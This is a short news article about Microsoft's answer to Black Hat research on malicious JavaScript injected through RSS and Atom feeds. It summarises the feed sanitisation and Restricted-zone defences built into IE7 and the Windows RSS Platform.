Internet Explorer 7 - Bulletproofed Against Attacks via Feeds

Walter VonKoch, Internet Explorer Program Manager has addressed on the Microsoft Team RSS Blog page the recent issue put forward at the Black Hat conference in Las Vegas by Robert Auger and Caleb Sima of SPI Dynamics, regarding vulnerabilities associated with RSS (Really Simple Syndication) feeds or Atom formats. The two researchers demonstrated how malicious JavaScript code masquerading as text embedded in the data field could be transferred via a feed injection through RSS or Atom formats onto subscribers' machines.

"We think it's good for the RSS community and users that the potential dangers of malicious script in feeds are pointed out and thereby can be addressed by application developers before any attacks materialize," stated VonKoch.

The IE program manager also described the integration of several mitigations into IE7 and the Windows RSS Platform that make Microsoft's products bulletproof to potentially malicious scripts in feeds. VonKoch made reference to the sanitation process inherent with downloading feeds, in which description element and title elements scripts are removed from HTML fields and treated as text. The fact that HTML tags are entity encoded prior to making the content accessible via feed viewing applications, including IE7's Feed View and that the feed content is stored sanitized in the Feed Store immunizes against malicious embedded JavaScript content.

"The IE7 Feed View displays feeds in the Restricted security zone, no matter where the feed originated, even if for example the feed came from a site in the Trusted Sites zone. By default script is disabled in the Restricted zone. In addition, the Feed View disallows URL Actions including script and active content," explained VonKoch.

He also advised developers hosting MSHTML within their applications to implement custom security managers in order to identify permissible URL Actions and to limit their volume in order to decrease the attack areal of the application.